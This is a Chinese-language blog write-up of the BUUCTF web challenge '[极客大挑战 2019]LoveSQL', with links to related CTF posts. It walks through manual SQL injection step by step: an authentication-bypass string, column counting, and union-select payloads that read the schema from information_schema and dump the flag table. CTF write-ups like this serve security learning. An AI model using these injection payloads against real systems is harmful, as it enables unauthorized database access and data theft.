当前位置:首页 > CTF > BUU > 正文内容

BUUCTF_web_第八题:[极客大挑战 2019]LoveSQL

七星3个月前 (01-21)BUU167


打开之后, 和之前的类似, 万能密码 1' or 1=1#登录成功,

给了一个admin和一串md5, md5解密失败.

只能常规注入了.

给了个灵魂试探:用 sqlmap 是没有灵魂的

那就手工注入一下,巩固sql语法:

先order by看字段, order by 4的时候,报错了.说明有3个字段.

接着联合查询:

?username=1' union select 1,2,3%23&password=aa

返回

Hello 2!

Your password is '3'

2和3是注入点,通过2注入点再看看数据库:

?username=1' union select 1,database(),3%23&password=aa

返回

Hello geek!

Your password is '3'

得到数据库 geek!


然后爆表名:

?username=1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=aa

得到

Your password is 'geekuser,l0ve1ysq1'

就有两个表:

'geekuser,l0ve1ysq1

盲猜flag在不正常的这个表里


然后爆字段:

?username=1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'%23&password=aa

返回

Your password is 'id,username,password'

三个字段,然后直接查询就好了

?username=1' union select 1,database(),group_concat(id,username,password) from l0ve1ysq1%23&password=aa

然后直接出flag了.


qixingbit.com|七星比特

相关文章

BUUCTF_web_第六题:[ACTF2020 新生赛]Include

BUUCTF_web_第六题:[ACTF2020 新生赛]Include

发现是一道include的题, 啥提示也没有,点一下给个tips, 获取到一个?file=flag.php很自然想到了include可以把文件base64再读取文件:/?file=php:/...

BUUCTF_web_第13题:[RoarCTF 2019]Easy Calc

BUUCTF_web_第13题:[RoarCTF 2019]Easy Calc

打开题, 发现是个计算器,传入表达式,计算结果,乍一看没啥问题然后祖传的f12, 首先看到的就是一个祖传的注释:<!--I've set up WAF to ensure security.--...

BUUCTF_web_第12题:[极客大挑战 2019]Knife

BUUCTF_web_第12题:[极客大挑战 2019]Knife

本题考查了中国菜刀的使用, 及简单一句话理解阅读题目打开, 发现给了一句话:直接用中国菜刀连上:在根目录下直接找到了flag...

BUUCTF_web_第15题:[极客大挑战 2019]PHP_序列化详解

BUUCTF_web_第15题:[极客大挑战 2019]PHP_序列化详解

打开题目, 有个猫, 先云吸个猫再说. 然后提到了备份网站. 既然是备份那自然想到的是www.rar或者zip之类的, 再不行就爆破一下路径也就出来了, 这个题是www.zip, 直接访问,...

BUUCTF_web_第11题:[护网杯 2018]easy_tornado

BUUCTF_web_第11题:[护网杯 2018]easy_tornado

开靶场, 有三个文件链接,依次点开, 有个提示:flag in /fllllllllllllag然后观察url发现,访问文件是需要提交一个filehash值的:/file?filename=/flag...

BUUCTF_web_第14题:[极客大挑战 2019]Http

BUUCTF_web_第14题:[极客大挑战 2019]Http

打开是个常规的主页,依旧是祖传的f12,仔细看,有个Secret.php这是仅有的线索, 访问一下喽:提示:It doesn't come from 'https://www.Sycsecret.co...

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。